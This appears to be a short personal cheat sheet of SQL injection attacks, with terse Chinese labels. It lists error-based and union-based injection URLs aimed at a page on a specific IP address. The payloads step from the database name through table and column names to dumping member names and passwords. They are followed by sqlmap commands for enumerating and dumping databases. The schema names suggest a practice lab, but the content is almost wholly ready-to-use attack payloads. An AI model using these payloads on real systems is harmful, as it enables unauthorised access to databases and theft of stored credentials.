sqlmap

http://219.153.49.228:44580/new_list.php?id=1' and updatexml (1,concat(0x7e,(select database()),0x7e),1)--+
http://219.153.49.228:44580/new_list.php?id=1' and updatexml (1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='stormgroup'),0x7e),1)--+
http://219.153.49.228:44580/new_list.php?id=1' and updatexml (1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='stormgroup' and table_name = 'member'),0x7e),1)--+









http://219.153.49.228:48166/new_list.php?id=1 and length (database())=10

http://219.153.49.228:47592/new_list.php?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema ='mozhe_Discuz_StormGroup' ),3,4
http://219.153.49.228:47592/new_list.php?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema ='mozhe_Discuz_StormGroup' and table_name = 'StormGroup_member' ),3,4
http://219.153.49.228:47592/new_list.php?id=-1 union select 1,(select group_concat(name,password) from mozhe_Discuz_StormGroup.StormGroup_member ),3,4





测试注入：python sqlmap.py -u "url"
注数据库：python sqlmap.py -u "url" --dbs
注当前数据库：python sqlmap.py -u "url" --current-db
注当前数据库用户名：python sqlmap.py -u "url" --current-user
注表名：python sqlmap.py -u "url" -D 库名 --tables
注列名：python sqlmap.py -u "url" -D 库名 -T 表名 --columns
注数据：python sqlmap.py -u "url" -D 库名 -T 表名 -C 列名,列名 --dump
查询表条数：python sqlmap.py -u "url" --count -D 当前数据库名
    




extarctvalue  floor(ran)